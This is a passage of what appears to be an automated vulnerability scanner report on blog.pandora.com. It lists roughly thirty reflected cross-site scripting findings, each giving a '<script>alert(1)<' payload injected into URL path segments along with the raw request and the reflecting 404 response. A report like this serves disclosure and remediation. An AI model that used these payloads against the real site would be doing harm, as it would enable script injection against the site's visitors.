GET /pandora/archives/floridac2e2a<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/floridac2e2a<script>alert(1)< ...[SNIP]... |
3.335. http://blog.pandora.com/pandora/archives/georgia/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/georgia |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f19a8<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf19a8<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraf19a8<script>alert(1)< ...[SNIP]... |
3.336. http://blog.pandora.com/pandora/archives/georgia/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/georgia |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9bc1a<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9bc1a<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9bc1a<script>alert(1)< ...[SNIP]... |
3.337. http://blog.pandora.com/pandora/archives/georgia/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/georgia |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b929c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/georgiab929c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/georgiab929c<script>alert(1)< ...[SNIP]... |
3.338. http://blog.pandora.com/pandora/archives/illinois/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 937ab<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora937ab<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora937ab<script>alert(1)< ...[SNIP]... |
3.339. http://blog.pandora.com/pandora/archives/illinois/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aecb2<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesaecb2<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesaecb2<script>alert(1)< ...[SNIP]... |
3.340. http://blog.pandora.com/pandora/archives/illinois/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37ffe<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 350 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.341. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/images |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba293<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraba293<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraba293<script>alert(1)< ...[SNIP]... |
3.342. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/images |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11e99<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives11e99<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives11e99<script>alert(1)< ...[SNIP]... |
3.343. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/images |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6f474<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/images6f474<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/images6f474<script>alert(1)< ...[SNIP]... |
3.344. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/images |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4bae<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/images Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/images ...[SNIP]... |
3.345. http://blog.pandora.com/pandora/archives/indiana/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/indiana |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c18ce<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorac18ce<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorac18ce<script>alert(1)< ...[SNIP]... |
3.346. http://blog.pandora.com/pandora/archives/indiana/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/indiana |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8819<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf8819<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf8819<script>alert(1)< ...[SNIP]... |
3.347. http://blog.pandora.com/pandora/archives/indiana/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/indiana |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6554d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/indiana6554d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/indiana6554d<script>alert(1)< ...[SNIP]... |
3.348. http://blog.pandora.com/pandora/archives/louisiana/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd390<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabd390<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabd390<script>alert(1)< ...[SNIP]... |
3.349. http://blog.pandora.com/pandora/archives/louisiana/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d4792<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd4792<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesd4792<script>alert(1)< ...[SNIP]... |
3.350. http://blog.pandora.com/pandora/archives/louisiana/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4595a<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.351. http://blog.pandora.com/pandora/archives/maine/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/maine/ |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4aa7e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4aa7e<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4aa7e<script>alert(1)< ...[SNIP]... |
3.352. http://blog.pandora.com/pandora/archives/maine/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/maine/ |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a36c6<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa36c6<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 346 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesa36c6<script>alert(1)< ...[SNIP]... |
3.353. http://blog.pandora.com/pandora/archives/maine/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/maine/ |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 32ddc<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/maine32ddc<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/maine32ddc<script>alert(1)< ...[SNIP]... |
3.354. http://blog.pandora.com/pandora/archives/maryland/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b372a<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab372a<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 350 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorab372a<script>alert(1)< ...[SNIP]... |
3.355. http://blog.pandora.com/pandora/archives/maryland/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35554<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives35554<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives35554<script>alert(1)< ...[SNIP]... |
3.356. http://blog.pandora.com/pandora/archives/maryland/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload efc2f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.357. http://blog.pandora.com/pandora/archives/massachusetts/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 682e0<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora682e0<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:05 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora682e0<script>alert(1)< ...[SNIP]... |
3.358. http://blog.pandora.com/pandora/archives/massachusetts/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8c214<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8c214<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives8c214<script>alert(1)< ...[SNIP]... |
3.359. http://blog.pandora.com/pandora/archives/massachusetts/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 40eea<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.360. http://blog.pandora.com/pandora/archives/michigan/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ee6f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7ee6f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora7ee6f<script>alert(1)< ...[SNIP]... |
3.361. http://blog.pandora.com/pandora/archives/michigan/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 947a8<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives947a8<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives947a8<script>alert(1)< ...[SNIP]... |
3.362. http://blog.pandora.com/pandora/archives/michigan/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6569b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.363. http://blog.pandora.com/pandora/archives/minnesota/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8487c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8487c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 351 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8487c<script>alert(1)< ...[SNIP]... |
3.364. http://blog.pandora.com/pandora/archives/minnesota/ [REST URL parameter 2] previous next
Summary
Severity: | High |
